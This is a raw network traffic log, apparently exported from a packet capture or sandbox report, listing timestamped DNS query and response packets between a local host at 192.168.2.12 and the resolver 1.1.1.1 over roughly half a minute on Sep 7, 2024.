                                                                                                                                                                    Sep 7, 2024 15:36:11.222125053 CEST53602561.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:11.306272984 CEST5380253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:11.410176039 CEST53538021.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:11.494333029 CEST5743753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:11.523753881 CEST53574371.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:11.603713989 CEST5253453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:11.868696928 CEST5253453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:11.937242031 CEST53525341.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:11.937273026 CEST53525341.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:12.009428024 CEST5630553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:12.019562006 CEST53563051.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:12.103785038 CEST5790353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:12.112852097 CEST53579031.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:12.118827105 CEST5622653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:12.128101110 CEST53562261.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:12.212485075 CEST5830753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:12.477757931 CEST5830753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:13.059515953 CEST53583071.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:13.059942961 CEST53583071.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:13.134972095 CEST6543953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:13.384390116 CEST6543953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:13.422089100 CEST53654391.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:13.422107935 CEST53654391.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:13.493702888 CEST4934553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:13.503149986 CEST53493451.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:13.588057995 CEST6259653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:13.623332977 CEST53625961.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:13.697391987 CEST5970353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:13.720735073 CEST53597031.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:13.790735006 CEST5908753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:13.801739931 CEST53590871.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:13.885973930 CEST6473653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:13.923624039 CEST53647361.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:13.998162985 CEST6491053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:14.047854900 CEST53649101.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:14.118912935 CEST5896053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:14.368367910 CEST5896053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:14.522686005 CEST53589601.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:14.522699118 CEST53589601.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:14.603147030 CEST5716953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:14.799357891 CEST53571691.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:14.869343042 CEST5069653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:14.966624975 CEST53506961.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:15.040564060 CEST5201653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:15.050441027 CEST53520161.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:15.134388924 CEST5217453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:15.155623913 CEST53521741.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:15.243676901 CEST5429453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:15.483743906 CEST53542941.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:15.556754112 CEST5487853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:15.566143036 CEST53548781.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:15.649960041 CEST6366853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:15.906917095 CEST53636681.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:15.978662968 CEST5093153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:16.227972984 CEST5093153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:16.673919916 CEST53509311.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:16.673934937 CEST53509311.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:16.744456053 CEST5415453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:16.993412018 CEST5415453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:17.237545013 CEST53541541.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:17.238293886 CEST53541541.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:17.308535099 CEST6088753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:17.318799019 CEST53608871.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:17.399981022 CEST4984353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:17.410693884 CEST53498431.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:17.431250095 CEST6458653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:17.440295935 CEST53645861.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:17.509391069 CEST6118153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:17.740492105 CEST53611811.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:17.822696924 CEST5816153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:17.842803955 CEST53581611.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:17.932441950 CEST6205253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:17.950392962 CEST53620521.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:18.025389910 CEST5024553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:18.275021076 CEST5024553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:19.125073910 CEST53502451.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:19.198615074 CEST5849753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:19.354211092 CEST53502451.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:19.446696043 CEST5849753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:19.870588064 CEST53584971.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:19.870604992 CEST53584971.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:19.952105999 CEST5863153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:19.965411901 CEST53586311.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:20.040597916 CEST5496153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:20.051193953 CEST53549611.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:20.165782928 CEST5060253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:20.178867102 CEST53506021.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:20.246988058 CEST5113153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:20.281522989 CEST53511311.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:20.353751898 CEST5091353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:20.392867088 CEST53509131.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:20.462595940 CEST5866053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:20.705992937 CEST53586601.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:20.806397915 CEST5249153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:20.978777885 CEST53524911.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:21.056251049 CEST5461353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:21.271887064 CEST53546131.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:21.337691069 CEST5903653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:21.354468107 CEST53590361.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:21.450294018 CEST4921453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:21.551110983 CEST53492141.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:21.619009972 CEST5476853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:21.684967995 CEST53547681.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:21.775290012 CEST4935353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:21.785684109 CEST53493531.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:21.853238106 CEST6178653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:21.862315893 CEST53617861.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:21.931252003 CEST5942153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:21.944058895 CEST53594211.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:22.009416103 CEST5878153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:22.022783041 CEST53587811.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:22.262403965 CEST5990553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:22.272502899 CEST53599051.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:22.340429068 CEST6421753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:22.425153971 CEST53642171.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:22.498281002 CEST6477853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:22.674036026 CEST53647781.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:22.744339943 CEST6257853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:22.983005047 CEST53625781.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:23.056756020 CEST5099553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:23.077945948 CEST53509951.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:23.151118040 CEST5365853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:23.333920002 CEST53536581.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:23.401840925 CEST4916353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:23.434022903 CEST53491631.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:23.509367943 CEST5199953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:23.533618927 CEST53519991.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:23.603286982 CEST5506053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:23.624089956 CEST53550601.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:23.697227955 CEST4939153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:23.717252970 CEST53493911.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:23.790685892 CEST5659153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:23.812021971 CEST53565911.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:23.884392023 CEST6154553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:24.152789116 CEST6154553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:24.329016924 CEST53615451.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:24.329027891 CEST53615451.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:24.399966002 CEST6073753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:24.412817001 CEST53607371.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:24.493973970 CEST5889853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:24.758936882 CEST5889853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:24.773329020 CEST53588981.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:24.773428917 CEST53588981.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:24.837848902 CEST5518153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:24.847522020 CEST53551811.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:24.915621042 CEST5211853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:25.165211916 CEST5211853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:25.170522928 CEST53521181.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:25.173394918 CEST53521181.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:25.243735075 CEST6135353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:25.259280920 CEST53613531.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:25.337680101 CEST5863153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:25.439960957 CEST53586311.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:25.509643078 CEST5997653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:25.761424065 CEST5997653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:26.037377119 CEST53599761.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:26.037408113 CEST53599761.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:26.127012968 CEST6345353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:26.139256954 CEST53634531.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:26.259831905 CEST6551053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:26.285085917 CEST53655101.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:26.353399038 CEST5495253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:26.417613029 CEST53549521.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:26.478166103 CEST5254853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:26.647491932 CEST53525481.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:26.712523937 CEST5135353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:26.885525942 CEST53513531.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:26.947166920 CEST5113353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:27.197351933 CEST5113353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:27.204102993 CEST53511331.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:27.440016031 CEST53511331.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:27.744379997 CEST5987953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:27.755419970 CEST53598791.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:27.821902990 CEST5937853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:27.831721067 CEST53593781.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:27.838037014 CEST5114653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:27.846678972 CEST53511461.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:27.915749073 CEST5828953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:28.181704998 CEST5828953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:28.438683033 CEST53582891.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:28.441802979 CEST53582891.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:28.510374069 CEST5607653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:28.545135975 CEST53560761.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:28.603360891 CEST6300453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:28.615714073 CEST53630041.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:28.697231054 CEST5152053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:28.871189117 CEST53515201.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:28.935172081 CEST5230253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:28.952542067 CEST53523021.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:29.025347948 CEST6190753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:29.188149929 CEST53619071.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:29.259438038 CEST6545953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:29.325443983 CEST53654591.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:29.385051012 CEST5853853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:29.573375940 CEST53585381.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:29.634484053 CEST5990953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:29.643543005 CEST53599091.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:29.712476015 CEST5916453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:29.721539021 CEST53591641.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:29.790894985 CEST6027253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:29.800024986 CEST53602721.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:29.868752003 CEST5210753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:29.877839088 CEST53521071.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:29.946959019 CEST5598653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:29.956830978 CEST53559861.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:30.571965933 CEST6066953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:30.810750008 CEST53606691.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:30.882702112 CEST5231153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:30.902662992 CEST53523111.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:30.978600979 CEST6441853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:31.029550076 CEST53644181.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:31.088689089 CEST6361353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:31.108710051 CEST53636131.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:31.181476116 CEST6308353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:31.198681116 CEST53630831.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:31.260333061 CEST5164853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:31.297394037 CEST53516481.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:31.355392933 CEST6542953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:31.365334988 CEST53654291.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:31.431255102 CEST6402753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:31.440865040 CEST53640271.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:31.509633064 CEST4947053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:31.536709070 CEST53494701.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:31.603225946 CEST6208853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:31.852842093 CEST6208853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:31.890657902 CEST53620881.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:31.892719984 CEST53620881.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:31.947993040 CEST5517153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:32.135754108 CEST53551711.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:32.197084904 CEST6196253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:32.300569057 CEST53619621.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:32.354271889 CEST6065153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:32.619091988 CEST6065153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:32.712579966 CEST53606511.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:32.712595940 CEST53606511.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:32.777771950 CEST5543653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:32.970581055 CEST53554361.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:33.030886889 CEST5118653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:33.085376024 CEST53511861.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:33.151071072 CEST4999853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:33.399847984 CEST4999853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:33.600079060 CEST53499981.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:33.721656084 CEST53499981.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:34.197035074 CEST5241853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:34.239613056 CEST53524181.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:34.306333065 CEST5022853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:34.549259901 CEST53502281.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:34.603240967 CEST5503653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:34.656289101 CEST53550361.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:34.714087009 CEST5172853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:34.978075981 CEST5172853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:34.985256910 CEST53517281.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:34.999533892 CEST53517281.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:35.618741035 CEST6317753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:35.884320021 CEST6317753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:35.903554916 CEST53631771.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:35.903578997 CEST53631771.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:35.964894056 CEST5437453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:36.003273010 CEST53543741.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:36.056344032 CEST5695453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:36.306293011 CEST5695453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:36.340173960 CEST53569541.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:36.340187073 CEST53569541.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:36.348619938 CEST5348753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:36.356523991 CEST53534871.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:36.416169882 CEST4943853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:36.425890923 CEST53494381.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:36.494398117 CEST5950953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:36.506493092 CEST53595091.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:36.572036028 CEST6032653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:36.818777084 CEST53603261.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:36.868956089 CEST5785853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:37.108726978 CEST53578581.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:37.173464060 CEST5666853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:37.431615114 CEST5666853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:37.475117922 CEST53566681.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:37.475131989 CEST53566681.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:37.524945974 CEST5893353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:37.781368017 CEST53589331.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:37.848614931 CEST6417553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:38.102840900 CEST6417553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:38.189040899 CEST53641751.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:38.189055920 CEST53641751.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:38.243855953 CEST6481553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:38.426079035 CEST53648151.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:38.478568077 CEST6372653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:38.533668041 CEST53637261.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:38.604798079 CEST6358653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:38.627985954 CEST53635861.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:38.697221994 CEST6324353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:38.716774940 CEST53632431.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:38.775016069 CEST5316453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:38.808026075 CEST53531641.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:38.884635925 CEST6133753192.168.2.121.1.1.1
